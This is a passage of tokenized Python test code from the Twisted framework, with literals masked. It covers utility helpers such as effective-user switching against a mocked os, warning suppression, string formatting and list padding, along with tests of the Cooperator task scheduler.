assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == EqualToEverything ( ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == EqualToNothing ( ) ) <EOL> def test_rightHandArgumentImplementsUnequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != EqualToEverything ( ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != EqualToNothing ( ) ) <EOL> class RunAsEffectiveUserTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( os , "<STR_LIT>" , None ) is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . mockos = MockOS ( ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . geteuid ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . getegid ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . seteuid ) <EOL> self . patch ( os , "<STR_LIT>" , self . mockos . setegid ) <EOL> def _securedFunction ( self , startUID , startGID , wantUID , wantGID ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( wantUID == startUID or <EOL> wantUID == self . mockos . seteuidCalls [ - <NUM_LIT:1> ] ) <EOL> self . assertTrue ( wantGID == startGID or <EOL> wantGID == self . mockos . setegidCalls [ - <NUM_LIT:1> ] ) <EOL> def test_forwardResult ( self ) : <EOL> """<STR_LIT>""" <EOL> result = util . runAsEffectiveUser ( <NUM_LIT:0> , <NUM_LIT:0> , lambda : <NUM_LIT:1> ) <EOL> self . assertEqual ( result , <NUM_LIT:1> ) <EOL> def test_takeParameters ( self ) : <EOL> """<STR_LIT>""" <EOL> result = util . runAsEffectiveUser ( <NUM_LIT:0> , <NUM_LIT:0> , lambda x : <NUM_LIT:2> * x , <NUM_LIT:3> ) <EOL> self . assertEqual ( result , <NUM_LIT:6> ) <EOL> def test_takesKeyworkArguments ( self ) : <EOL> """<STR_LIT>""" <EOL> result = util . runAsEffectiveUser ( <NUM_LIT:0> , <NUM_LIT:0> , lambda x , y = <NUM_LIT:1> , z = <NUM_LIT:1> : x * y * z , <NUM_LIT:2> , z = <NUM_LIT:3> ) <EOL> self . 
assertEqual ( result , <NUM_LIT:6> ) <EOL> def _testUIDGIDSwitch ( self , startUID , startGID , wantUID , wantGID , <EOL> expectedUIDSwitches , expectedGIDSwitches ) : <EOL> """<STR_LIT>""" <EOL> self . mockos . euid = startUID <EOL> self . mockos . egid = startGID <EOL> util . runAsEffectiveUser ( <EOL> wantUID , wantGID , <EOL> self . _securedFunction , startUID , startGID , wantUID , wantGID ) <EOL> self . assertEqual ( self . mockos . seteuidCalls , expectedUIDSwitches ) <EOL> self . assertEqual ( self . mockos . setegidCalls , expectedGIDSwitches ) <EOL> self . mockos . seteuidCalls = [ ] <EOL> self . mockos . setegidCalls = [ ] <EOL> def test_root ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , [ ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> def test_UID ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ) <EOL> def test_GID ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
_testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , [ ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , [ <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> def test_UIDGID ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , [ ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:1> , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> self . _testUIDGIDSwitch ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , [ <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:2> , <NUM_LIT:1> ] ) <EOL> def _getDeprecationSuppression ( f ) : <EOL> """<STR_LIT>""" <EOL> return SUPPRESS ( <EOL> category = DeprecationWarning , <EOL> message = '<STR_LIT>' % ( fullyQualifiedName ( f ) , ) ) <EOL> class InitGroupsTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . addCleanup ( setattr , util , "<STR_LIT>" , util . 
_initgroups ) <EOL> self . addCleanup ( setattr , util , "<STR_LIT>" , util . setgroups ) <EOL> def test_initgroupsInStdlib ( self ) : <EOL> """<STR_LIT>""" <EOL> calls = [ ] <EOL> util . _initgroups = lambda x , y : calls . append ( ( x , y ) ) <EOL> setgroupsCalls = [ ] <EOL> util . setgroups = setgroupsCalls . append <EOL> util . initgroups ( os . getuid ( ) , <NUM_LIT:4> ) <EOL> self . assertEqual ( calls , [ ( pwd . getpwuid ( os . getuid ( ) ) [ <NUM_LIT:0> ] , <NUM_LIT:4> ) ] ) <EOL> self . assertFalse ( setgroupsCalls ) <EOL> if util . _initgroups is None : <EOL> test_initgroupsInStdlib . skip = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> class DeprecationTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_getPluginDirs ( self ) : <EOL> """<STR_LIT>""" <EOL> util . getPluginDirs ( ) <EOL> currentWarnings = self . flushWarnings ( offendingFunctions = [ <EOL> self . test_getPluginDirs ] ) <EOL> self . assertEqual ( <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> def test_addPluginDir ( self ) : <EOL> """<STR_LIT>""" <EOL> util . addPluginDir ( ) <EOL> currentWarnings = self . flushWarnings ( offendingFunctions = [ <EOL> self . test_addPluginDir ] ) <EOL> self . assertEqual ( <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> test_addPluginDir . suppress = [ <EOL> SUPPRESS ( category = DeprecationWarning , <EOL> message = "<STR_LIT>" ) <EOL> ] <EOL> class SuppressedWarningsTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> runWithWarningsSuppressed = staticmethod ( util . 
runWithWarningsSuppressed ) <EOL> def test_runWithWarningsSuppressedFiltered ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) , <EOL> ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) ] <EOL> self . runWithWarningsSuppressed ( filters , warnings . warn , "<STR_LIT>" ) <EOL> self . runWithWarningsSuppressed ( filters , warnings . warn , "<STR_LIT>" ) <EOL> self . assertEqual ( [ ] , self . flushWarnings ( ) ) <EOL> def test_runWithWarningsSuppressedUnfiltered ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) , <EOL> ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) ] <EOL> self . runWithWarningsSuppressed ( filters , warnings . warn , "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> [ "<STR_LIT>" ] , [ w [ '<STR_LIT:message>' ] for w in self . flushWarnings ( ) ] ) <EOL> def test_passThrough ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( self . runWithWarningsSuppressed ( [ ] , lambda : <NUM_LIT:4> ) , <NUM_LIT:4> ) <EOL> def test_noSideEffects ( self ) : <EOL> """<STR_LIT>""" <EOL> filters = [ ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) , <EOL> ( ( "<STR_LIT:ignore>" , "<STR_LIT>" ) , { } ) ] <EOL> self . runWithWarningsSuppressed ( filters , lambda : None ) <EOL> warnings . warn ( "<STR_LIT>" ) <EOL> self . assertEqual ( <EOL> [ "<STR_LIT>" ] , [ w [ '<STR_LIT:message>' ] for w in self . flushWarnings ( ) ] ) <EOL> class FancyStrMixinTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_sequenceOfStrings ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> first = <NUM_LIT:1> <EOL> second = "<STR_LIT:hello>" <EOL> self . assertEqual ( str ( Foo ( ) ) , "<STR_LIT>" ) <EOL> def test_formatter ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . 
FancyStrMixin ) : <EOL> showAttributes = ( <EOL> "<STR_LIT>" , <EOL> ( "<STR_LIT>" , lambda value : repr ( value [ : : - <NUM_LIT:1> ] ) ) ) <EOL> first = "<STR_LIT:hello>" <EOL> second = "<STR_LIT>" <EOL> self . assertEqual ( "<STR_LIT>" , str ( Foo ( ) ) ) <EOL> def test_override ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( "<STR_LIT>" , ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> first = <NUM_LIT:1> <EOL> second = <NUM_LIT> <EOL> self . assertEqual ( str ( Foo ( ) ) , "<STR_LIT>" ) <EOL> def test_fancybasename ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> fancybasename = "<STR_LIT>" <EOL> self . assertEqual ( str ( Foo ( ) ) , "<STR_LIT>" ) <EOL> def test_repr ( self ) : <EOL> """<STR_LIT>""" <EOL> class Foo ( util . FancyStrMixin ) : <EOL> showAttributes = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> first = <NUM_LIT:1> <EOL> second = "<STR_LIT:hello>" <EOL> obj = Foo ( ) <EOL> self . assertEqual ( str ( obj ) , repr ( obj ) ) <EOL> class PadToTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_default ( self ) : <EOL> """<STR_LIT>""" <EOL> padded = util . padTo ( <NUM_LIT:3> , [ ] ) <EOL> self . assertEqual ( [ None ] * <NUM_LIT:3> , padded ) <EOL> def test_specificDefaultValue ( self ) : <EOL> """<STR_LIT>""" <EOL> padded = util . padTo ( <NUM_LIT:4> , [ ] , "<STR_LIT:x>" ) <EOL> self . assertEqual ( [ "<STR_LIT:x>" ] * <NUM_LIT:4> , padded ) <EOL> def test_padNonEmptyList ( self ) : <EOL> """<STR_LIT>""" <EOL> padded = util . padTo ( <NUM_LIT:3> , [ <NUM_LIT:1> , <NUM_LIT:2> ] , "<STR_LIT:z>" ) <EOL> self . assertEqual ( [ <NUM_LIT:1> , <NUM_LIT:2> , "<STR_LIT:z>" ] , padded ) <EOL> def test_padToSmallerSize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( ValueError , util . 
padTo , <NUM_LIT:1> , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> def test_alreadyPadded ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> padded = util . padTo ( len ( items ) , items ) <EOL> self . assertEqual ( items , padded ) <EOL> def test_alreadyPaddedCopies ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> padded = util . padTo ( len ( items ) , items ) <EOL> self . assertIsNot ( padded , items ) <EOL> def test_makeCopy ( self ) : <EOL> """<STR_LIT>""" <EOL> items = [ ] <EOL> util . padTo ( <NUM_LIT:4> , items ) <EOL> self . assertEqual ( [ ] , items ) <EOL> class ReplaceIfTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_replacesIfTrue ( self ) : <EOL> """<STR_LIT>""" <EOL> @ util . _replaceIf ( True , lambda : "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> self . assertEqual ( test ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( test . __name__ , "<STR_LIT:test>" ) <EOL> self . assertEqual ( test . __module__ , "<STR_LIT>" ) <EOL> def test_keepsIfFalse ( self ) : <EOL> """<STR_LIT>""" <EOL> @ util . _replaceIf ( False , lambda : "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> self . assertEqual ( test ( ) , "<STR_LIT>" ) <EOL> def test_multipleReplace ( self ) : <EOL> """<STR_LIT>""" <EOL> @ util . _replaceIf ( True , lambda : "<STR_LIT>" ) <EOL> @ util . _replaceIf ( False , lambda : "<STR_LIT:bar>" ) <EOL> @ util . _replaceIf ( True , lambda : "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> self . assertEqual ( test ( ) , "<STR_LIT>" ) <EOL> def test_boolsOnly ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( ValueError ) as e : <EOL> @ util . _replaceIf ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def test ( ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( e . exception . args [ <NUM_LIT:0> ] , <EOL> ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> from twisted . internet import reactor , defer , task <EOL> from twisted . trial import unittest <EOL> class FakeDelayedCall ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , func ) : <EOL> """<STR_LIT>""" <EOL> self . func = func <EOL> self . cancelled = False <EOL> def cancel ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cancelled = True <EOL> class FakeScheduler ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . work = [ ] <EOL> def __call__ ( self , thunk ) : <EOL> """<STR_LIT>""" <EOL> unit = FakeDelayedCall ( thunk ) <EOL> self . work . append ( unit ) <EOL> return unit <EOL> def pump ( self ) : <EOL> """<STR_LIT>""" <EOL> work , self . work = self . work , [ ] <EOL> for unit in work : <EOL> if not unit . cancelled : <EOL> unit . func ( ) <EOL> class CooperatorTests ( unittest . TestCase ) : <EOL> RESULT = '<STR_LIT>' <EOL> def ebIter ( self , err ) : <EOL> err . trap ( task . SchedulerStopped ) <EOL> return self . RESULT <EOL> def cbIter ( self , ign ) : <EOL> self . fail ( ) <EOL> def testStoppedRejectsNewTasks ( self ) : <EOL> """<STR_LIT>""" <EOL> def testwith ( stuff ) : <EOL> c = task . Cooperator ( ) <EOL> c . stop ( ) <EOL> d = c . coiterate ( iter ( ( ) ) , stuff ) <EOL> d . addCallback ( self . cbIter ) <EOL> d . addErrback ( self . ebIter ) <EOL> return d . addCallback ( lambda result : <EOL> self . assertEqual ( result , self . RESULT ) ) <EOL> return testwith ( None ) . addCallback ( lambda ign : testwith ( defer . Deferred ( ) ) ) <EOL> def testStopRunning ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( ) <EOL> def myiter ( ) : <EOL> for myiter . value in range ( <NUM_LIT:3> ) : <EOL> yield myiter . value <EOL> myiter . value = - <NUM_LIT:1> <EOL> d = c . coiterate ( myiter ( ) ) <EOL> d . addCallback ( self . cbIter ) <EOL> d . addErrback ( self . ebIter ) <EOL> c . 
stop ( ) <EOL> def doasserts ( result ) : <EOL> self . assertEqual ( result , self . RESULT ) <EOL> self . assertEqual ( myiter . value , - <NUM_LIT:1> ) <EOL> d . addCallback ( doasserts ) <EOL> return d <EOL> def testStopOutstanding ( self ) : <EOL> """<STR_LIT>""" <EOL> testControlD = defer . Deferred ( ) <EOL> outstandingD = defer . Deferred ( ) <EOL> def myiter ( ) : <EOL> reactor . callLater ( <NUM_LIT:0> , testControlD . callback , None ) <EOL> yield outstandingD <EOL> self . fail ( ) <EOL> c = task . Cooperator ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> def stopAndGo ( ign ) : <EOL> c . stop ( ) <EOL> outstandingD . callback ( '<STR_LIT>' ) <EOL> testControlD . addCallback ( stopAndGo ) <EOL> d . addCallback ( self . cbIter ) <EOL> d . addErrback ( self . ebIter ) <EOL> return d . addCallback ( <EOL> lambda result : self . assertEqual ( result , self . RESULT ) ) <EOL> def testUnexpectedError ( self ) : <EOL> c = task . Cooperator ( ) <EOL> def myiter ( ) : <EOL> if <NUM_LIT:0> : <EOL> yield None <EOL> else : <EOL> raise RuntimeError ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> return self . assertFailure ( d , RuntimeError ) <EOL> def testUnexpectedErrorActuallyLater ( self ) : <EOL> def myiter ( ) : <EOL> D = defer . Deferred ( ) <EOL> reactor . callLater ( <NUM_LIT:0> , D . errback , RuntimeError ( ) ) <EOL> yield D <EOL> c = task . Cooperator ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> return self . assertFailure ( d , RuntimeError ) <EOL> def testUnexpectedErrorNotActuallyLater ( self ) : <EOL> def myiter ( ) : <EOL> yield defer . fail ( RuntimeError ( ) ) <EOL> c = task . Cooperator ( ) <EOL> d = c . coiterate ( myiter ( ) ) <EOL> return self . assertFailure ( d , RuntimeError ) <EOL> def testCooperation ( self ) : <EOL> L = [ ] <EOL> def myiter ( things ) : <EOL> for th in things : <EOL> L . 
append ( th ) <EOL> yield None <EOL> groupsOfThings = [ '<STR_LIT:abc>' , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) , '<STR_LIT>' , ( <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> ) ] <EOL> c = task . Cooperator ( ) <EOL> tasks = [ ] <EOL> for stuff in groupsOfThings : <EOL> tasks . append ( c . coiterate ( myiter ( stuff ) ) ) <EOL> return defer . DeferredList ( tasks ) . addCallback ( <EOL> lambda ign : self . assertEqual ( tuple ( L ) , sum ( zip ( * groupsOfThings ) , ( ) ) ) ) <EOL> def testResourceExhaustion ( self ) : <EOL> output = [ ] <EOL> def myiter ( ) : <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> output . append ( i ) <EOL> if i == <NUM_LIT:9> : <EOL> _TPF . stopped = True <EOL> yield i <EOL> class _TPF : <EOL> stopped = False <EOL> def __call__ ( self ) : <EOL> return self . stopped <EOL> c = task . Cooperator ( terminationPredicateFactory = _TPF ) <EOL> c . coiterate ( myiter ( ) ) . addErrback ( self . ebIter ) <EOL> c . _delayedCall . cancel ( ) <EOL> c . _tick ( ) <EOL> c . stop ( ) <EOL> self . assertTrue ( _TPF . stopped ) <EOL> self . assertEqual ( output , list ( range ( <NUM_LIT:10> ) ) ) <EOL> def testCallbackReCoiterate ( self ) : <EOL> """<STR_LIT>""" <EOL> calls = [ ] <EOL> class FakeCall : <EOL> def __init__ ( self , func ) : <EOL> self . func = func <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . func , ) <EOL> def sched ( f ) : <EOL> self . assertFalse ( calls , repr ( calls ) ) <EOL> calls . append ( FakeCall ( f ) ) <EOL> return calls [ - <NUM_LIT:1> ] <EOL> c = task . Cooperator ( scheduler = sched , terminationPredicateFactory = lambda : lambda : True ) <EOL> d = c . coiterate ( iter ( ( ) ) ) <EOL> done = [ ] <EOL> def anotherTask ( ign ) : <EOL> c . coiterate ( iter ( ( ) ) ) . addBoth ( done . append ) <EOL> d . addCallback ( anotherTask ) <EOL> work = <NUM_LIT:0> <EOL> while not done : <EOL> work += <NUM_LIT:1> <EOL> while calls : <EOL> calls . pop ( <NUM_LIT:0> ) . 
func ( ) <EOL> work += <NUM_LIT:1> <EOL> if work > <NUM_LIT:50> : <EOL> self . fail ( "<STR_LIT>" ) <EOL> def test_removingLastTaskStopsScheduledCall ( self ) : <EOL> """<STR_LIT>""" <EOL> calls = [ None ] <EOL> def sched ( f ) : <EOL> calls [ <NUM_LIT:0> ] = FakeDelayedCall ( f ) <EOL> return calls [ <NUM_LIT:0> ] <EOL> coop = task . Cooperator ( scheduler = sched ) <EOL> task1 = coop . cooperate ( iter ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> task2 = coop . cooperate ( iter ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . func , coop . _tick ) <EOL> task1 . stop ( ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . cancelled , False ) <EOL> self . assertEqual ( coop . _delayedCall , calls [ <NUM_LIT:0> ] ) <EOL> task2 . stop ( ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . cancelled , True ) <EOL> self . assertEqual ( coop . _delayedCall , None ) <EOL> coop . cooperate ( iter ( [ <NUM_LIT:1> , <NUM_LIT:2> ] ) ) <EOL> self . assertEqual ( calls [ <NUM_LIT:0> ] . cancelled , False ) <EOL> self . assertEqual ( coop . _delayedCall , calls [ <NUM_LIT:0> ] ) <EOL> def test_runningWhenStarted ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( ) <EOL> self . assertTrue ( c . running ) <EOL> def test_runningWhenNotStarted ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( started = False ) <EOL> self . assertFalse ( c . running ) <EOL> def test_runningWhenRunning ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( started = False ) <EOL> c . start ( ) <EOL> self . addCleanup ( c . stop ) <EOL> self . assertTrue ( c . running ) <EOL> def test_runningWhenStopped ( self ) : <EOL> """<STR_LIT>""" <EOL> c = task . Cooperator ( started = False ) <EOL> c . start ( ) <EOL> c . stop ( ) <EOL> self . assertFalse ( c . running ) <EOL> class UnhandledException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> class AliasTests ( unittest . 
TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_cooperate ( self ) : <EOL> """<STR_LIT>""" <EOL> d = defer . Deferred ( ) <EOL> def doit ( ) : <EOL> yield <NUM_LIT:1> <EOL> yield <NUM_LIT:2> <EOL> yield <NUM_LIT:3> <EOL> d . callback ( "<STR_LIT>" ) <EOL> it = doit ( ) <EOL> theTask = task . cooperate ( it ) <EOL> self . assertIn ( theTask , task . _theCooperator . _tasks ) <EOL> return d <EOL> class RunStateTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _doDeferNext = False <EOL> self . _doStopNext = False <EOL> self . _doDieNext = False <EOL> self . work = [ ] <EOL> self . scheduler = FakeScheduler ( ) <EOL> self . cooperator = task . Cooperator ( <EOL> scheduler = self . scheduler , <EOL> terminationPredicateFactory = lambda : lambda : True ) <EOL> self . task = self . cooperator . cooperate ( self . worker ( ) ) <EOL> self . cooperator . start ( ) <EOL> def worker ( self ) : <EOL> """<STR_LIT>""" <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> i += <NUM_LIT:1> <EOL> if self . _doDeferNext : <EOL> self . _doDeferNext = False <EOL> d = defer . Deferred ( ) <EOL> self . work . append ( d ) <EOL> yield d <EOL> elif self . _doStopNext : <EOL> return <EOL> elif self . _doDieNext : <EOL> raise UnhandledException ( ) <EOL> else : <EOL> self . work . append ( i ) <EOL> yield i <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> del self . task <EOL> del self . scheduler <EOL> def deferNext ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _doDeferNext = True <EOL> def stopNext ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _doStopNext = True <EOL> def dieNext ( self ) : <EOL> """<STR_LIT>""" <EOL> def ignoreUnhandled ( failure ) : <EOL> failure . trap ( UnhandledException ) <EOL> return None <EOL> self . _doDieNext = True <EOL> def test_pauseResume ( self ) : <EOL> """<STR_LIT>""" <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> ] ) <EOL> self . scheduler . 
pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . task . resume ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> def test_resumeNotPaused ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertRaises ( task . NotPaused , self . task . resume ) <EOL> self . task . pause ( ) <EOL> self . task . resume ( ) <EOL> self . assertRaises ( task . NotPaused , self . task . resume ) <EOL> def test_pauseTwice ( self ) : <EOL> """<STR_LIT>""" <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ ] ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( self . work , [ <NUM_LIT:1> ] ) <EOL> def test_pauseWhileDeferred ( self ) : <EOL> """<STR_LIT>""" <EOL> self . deferNext ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( isinstance ( self . work [ <NUM_LIT:0> ] , defer . Deferred ) ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . task . pause ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual ( len ( self . work ) , <NUM_LIT:1> ) <EOL> self . task . resume ( ) <EOL> self . scheduler . pump ( ) <EOL> self . assertEqual 